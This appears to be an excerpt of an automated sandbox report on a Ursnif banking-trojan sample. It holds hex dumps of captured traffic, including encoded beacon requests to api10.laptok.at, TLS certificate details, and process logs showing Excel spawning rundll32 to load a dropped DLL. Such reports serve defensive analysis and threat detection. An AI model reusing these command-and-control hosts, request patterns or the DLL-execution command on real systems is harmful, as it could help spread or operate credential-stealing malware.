5c 34 5b 50 06 05 9b f3 49 09 d8 2f e4 eb d1 42 42 8a 09 27 ca 13 a3 76 b7 f0 6d ae 58 ea f3 62 fb 83 3d 11 ee c1 d3 f8 69 4d db dc 5a 86 d1 f8 4b 10 b1 0c fe cd e5 9c 32 ec 5a 8c 6d 77 7f f9 29 d3 00 82 7b 73 5e d8 8c 1a dd d6 d1 23 6a a8 10 e0 a2 af ce f4 4c 6c 14 3a ef 7e 01 38 78 c7 0a 5e 24 bb a1 ee ca 4d af bc 2e 04 4d 76 98 ea d2 d6 69 c1 31 15 2e 0f be 55 c3 41 62 da 23 81 58 c0 6c 36 ca 71 e3 08 c9 1d d3 02 8d 35 1d 25 30 38 ff c4 5d 10 ec ba 73 2f b9 f0 9b bf 94 5c dc c7 0b 8b 5a 76 10 07 53 e9 e7 bb 0b a4 ed 8a 1d 86 6f 81 da 55 ca b2 87 90 16 66 53 19 a7 0a b7 66 95 78 92 d7 4b bb 38 e8 4d 09 7c 6c 86 c4 0a ba 01 45 a9 f1 92 5c 87 bd c1 82 21 9e 68 df 18 78 91 15 75 c1 2d ca b6 f3 59 06 25 8e 7b 56 11 87 58 a9 60 99 7c 13 30 66 eb 0c 0f c1 a4 d4 c3 88 a7 93 7c db 1e 8a a3 b0 d3 72 68 76 7e 46 4b f5 08 47 17 4a 23 20 36 6f 8a a4 66 11 71 79 3a e8 c7 91 c7 29 bb 82 6f 51 50 ab b2 89 8f f2 25 09 65 58 a5 c8 2c 01 9a f3 61 f3 93 af 44 32 3a 30 9c c8 04 fd be c1 27 98 e3 92 19 44 f8 54 01 44 ae 4d 92 54 af f4 46 81 e2 1b 2d 5c b4 8c fc db 75 fe ea ac 33 58 b8 a4 3e b9 f6 14 94 09 bf 83 bb 36 d3 d5 fe 06 b0 59 af df 5c 50 b9 f1 8b e0 13 4e 61 1e 10 7c 9e 0d b3 5b ce 36 13 fa a0 97 09 95 94 18 d9 e2 83 f8 8c 8d 84 75 df 11 a4 98 a1 b1 1e 75 12 25 92 ff 48 06 1a a2 eb 40 f9 03 e7 66 6d ad dc 27 2c 99 4c 71 96 14 06 9c 24 c5 d7 17 cf 7b 84 7f f5 5c e1 b6 23 67 25 e0 7e 6a e0 88 7e 13 1d 39 f0 53 30 af fd d3 2c 79 c7 97 67 6d ae 12 90 5c 64 ce fc e6 04 c2 cf 7c f8 f2 f0 c5 b2 3d e7 ec b7 5e 1b 0d 80 6f 0c e4 72 93 9d 21 84 3d 8c 5c 09 ae 45 fb
                                                                                                                                                  Data Ascii: 2000PE?ww:,KN{{LxzSxaABB/ayNP4]t+>p/:JOu[k*%}{~&uiQ8+gghG#8RkrZ<h%wCBps3C4R6Q@'/YpM#BBfO_^[@#OeQzxuK%]tR2AC;aj/Z#m*7~5_STxq\y-D.b6nn2mc:K`uR|` vV72ByT8Cb9`3GZ>{j-T4)kQG7~YZCJrUQ(ESsN9*O4mub(Ll\4[PI/BB'vmXb=iMZK2Zmw){s^#jLl:~8x^$M.Mvi1.UAb#Xl6q5%08]s/\ZvSoUfSfxK8M|lE\!hxu-Y%{VX`|0f|rhv~FKGJ# 6ofqy:)oQP%eX,aD2:0'DTDMTF-\u3X>6Y\PNa|[6uu%H@fm',Lq${\#g%~j~9S0,ygm\d|=^or!=\E


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  4192.168.2.64975835.228.31.4080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 9, 2021 18:44:03.194701910 CET5904OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: api10.laptok.at
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 9, 2021 18:44:03.299371958 CET5905INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 09 Feb 2021 17:44:03 GMT
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  5192.168.2.64975935.228.31.4080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 9, 2021 18:44:04.330867052 CET5906OUTGET /api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k HTTP/1.1
                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Host: api10.laptok.at
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 9, 2021 18:44:04.711205959 CET5907INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 09 Feb 2021 17:44:04 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Data Raw: 37 35 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 96 c5 81 84 00 00 c4 0a e2 c1 e2 f0 c4 dd 9d 1f ee ee 54 7f d7 43 26 13 99 f0 fa 8e e0 05 f9 06 ae 0f 68 b1 0c 60 df 25 66 de 52 7a 49 54 a7 42 46 cb 3c b8 bb a0 73 1c dc ec 1d 27 cf af 0f 9c 5f bb 88 f2 1d f3 5c b4 ef 7c 46 a5 a9 87 37 9a d8 2d 51 5c fb 77 3a c8 35 e9 8d a1 65 21 50 31 7b 23 8a 89 53 2f 0f 84 ae 6a 8f d8 a5 9d 60 9c 6b f8 87 11 db 3d 18 f2 91 df 0c d4 cb c9 e5 4f bc 7c 6c c1 18 57 54 15 f8 d2 4f ce 23 6f 68 6c a2 8b 3f 23 9e ef 67 27 7b 34 f0 0d 8c fd 43 72 87 22 db dc 28 83 3c 5a 98 86 32 35 0f e8 bc 17 44 41 17 9d 72 67 b8 1f 39 4e a7 c1 ff 04 d4 da 5e c3 bb af 45 c8 ec a1 17 97 c4 56 eb 86 47 eb a2 61 91 34 8b 97 cb 4f 20 90 e2 7d a1 85 38 bd 9b 7c 11 14 ba ea a5 84 77 d7 70 d3 c5 c0 e5 50 02 b4 a7 57 4e 85 76 ba 47 f4 f4 79 65 05 b9 07 a9 8b 8e 4b 51 77 71 1f 0c 16 ba aa 4b b4 50 eb 25 53 46 52 ef b0 b5 96 cd 2b 69 c7 6b 75 19 b6 99 cf 00 8f 17 98 a7 93 8e 35 4a 30 fd 13 7e 91 e4 37 64 bb d4 a6 a3 e8 2d 91 01 fe 32 20 8d 05 66 49 c8 60 16 56 f2 60 9e a4 76 1f 83 73 b8 f2 3a 7e c3 2b 3d 61 87 66 d9 92 4f e4 89 7d 86 61 ef 51 5d d3 42 cd a3 47 c6 b7 1f 41 3c 12 f6 d9 31 e4 ca c2 0a c5 94 31 27 af a3 80 db 5e 36 e0 5e 2a ba 87 e2 31 2d d7 40 a8 6b f0 52 f3 4d 48 ae 0a 77 e0 6e 70 c1 d4 03 16 01 59 b2 88 ae ee 8f c6 9e 48 80 a6 5d 8e de 61 6e ef 2b 9d 5f 97 47 10 e2 8a fe 00 5c 2e 85 8a 44 73 5a 1d 48 9a 78 18 cc 7a 9e b5 c1 a0 ae 16 56 79 bf 97 c5 ed b8 86 9e a3 ad de b2 5f db 21 65 04 61 3b 9c ad 38 64 b7 c3 ad b3 42 97 eb a1 3c ed 46 f0 36 ae be 5c 19 c2 50 fc 69 73 02 4d 0c 64 dd 73 79 15 fa 85 7a 95 fa bc 35 9a 00 22 99 19 e6 2e e1 34 1a 49 96 e4 92 75 64 dd b9 a7 1e 64 df c5 27 3c 3b 3f 05 ed 4c a9 6f bb b5 d6 77 3d ee 49 ec 50 b4 eb dd b4 bd 37 a8 52 5e cc da fe 93 81 da f4 fd 76 65 8f 79 f5 c3 1c 69 81 12 2b 54 29 11 35 22 d5 68 43 6e 7b e9 7b 68 2b ed c4 95 a8 45 84 ac c3 ac 38 15 cb af 43 95 f3 81 99 14 a7 6c 42 0a a3 79 2e af a4 c4 81 c1 54 28 67 eb 4d 01 c0 f6 c3 45 c2 16 37 56 90 37 e0 f4 23 90 c6 ed da 3a 33 10 1c 18 90 4d ba d5 a7 48 c6 42 42 83 3e ef 33 e4 d6 19 29 7b 94 ef 83 d2 29 cc 0f 89 59 6d f8 8e c9 be 9d 05 3b dc 6d 19 58 04 a0 39 48 19 93 0b b6 c9 20 3a 6b 76 4e ce 15 61 49 a0 bd 7a b0 34 a5 85 73 0b d3 72 16 af fa 8d 11 89 be e2 23 24 a7 e0 36 c8 c8 b9 0b 5d e8 6d 0c 29 5c de 7c 0a a9 6a 00 30 fe 2f 55 67 50 55 50 dd 43 84 a1 c2 1f f1 12 ef 97 22 13 1f 90 36 e9 df 61 a8 0a c3 4e 38 fa ac ca 1a 92 e7 2a 73 e2 e1 0b 14 44 af d0 e9 bb 07 b2 7d 6f c7 62 06 03 ab 22 3d fd 18 23 1e 44 96 5f b4 31 ab 77 37 5e 0b 67 94 28 69 51 75 2a fb 24 99 47 8d ae ce 9f fb 05 cb c7 6c f7 1b b1 53 f0 23 a5 75 ac 32 dc 84 8d 24 da 1f 33 bc d6 91 10 cf 3c 4a 34 f2 13 4a 0d 3f 92 c6 37 46 f9 6a 02 1f 82 e6 d5 a9 50 46 89 d1 cb e1 41 e1 b5 90 ba ad 24 3a 6f ce 14 a0 9e 4f 0e 4e 1a 91 dd dd 6e 31 45 55 5d 72 1d ed a8 68 51 78 d6 44 f4 b1 0e f1 0e 7f e5 50 c4 47 d7 be 0d bc 46 04 93 af 47 46 93 23 08 5a 70 69 03 c1 3d 2b 57 e7 b4 17 cf 7d e4 43 c9 09 91 eb 2e 68 d1 26 f4 6e a3 bd 73 36 54 b4 ca 74 d9 35 f5 14 22 fb 86 01 b7 bc 49 ad 1f 3d 26 cf b4 3e 4b ee 71 26 50 56 ab 1f 66 73 c1 86 5e
                                                                                                                                                  Data Ascii: 75fTC&h`%fRzITBF<s'_\|F7-Q\w:5e!P1{#S/j`k=O|lWTO#ohl?#g'{4Cr"(<Z25DArg9N^EVGa4O }8|wpPWNvGyeKQwqKP%SFR+iku5J0~7d-2 fI`V`vs:~+=afO}aQ]BGA<11'^6^*1-@kRMHwnpYH]an+_G\.DsZHxzVy_!ea;8dB<F6\PisMdsyz5".4Iudd'<;?Low=IP7R^veyi+T)5"hCn{{h+E8ClBy.T(gME7V7#:3MHBB>3){)Ym;mX9H :kvNaIz4sr#$6]m)\|j0/UgPUPC"6aN8*sD}ob"=#D_1w7^g(iQu*$GlS#u2$3<J4J?7FjPFA$:oONn1EU]rhQxDPGFGF#Zpi=+W}C.h&ns6Tt5"I=&>Kq&PVfs^


                                                                                                                                                  HTTPS Packets

                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                  Feb 9, 2021 18:41:49.329449892 CET192.185.16.102443192.168.2.649728CN=urbandancecity.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSun Jul 05 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Tue Jul 06 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                  CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                  CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:18:41:39
                                                                                                                                                  Start date:09/02/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x10c0000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:18:41:57
                                                                                                                                                  Start date:09/02/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
                                                                                                                                                  Imagebase:0x13a0000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:18:43:58
                                                                                                                                                  Start date:09/02/2021
                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                  Imagebase:0x7ff721e20000
                                                                                                                                                  File size:823560 bytes
                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:18:43:58
                                                                                                                                                  Start date:09/02/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
                                                                                                                                                  Imagebase:0x310000
                                                                                                                                                  File size:822536 bytes
                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >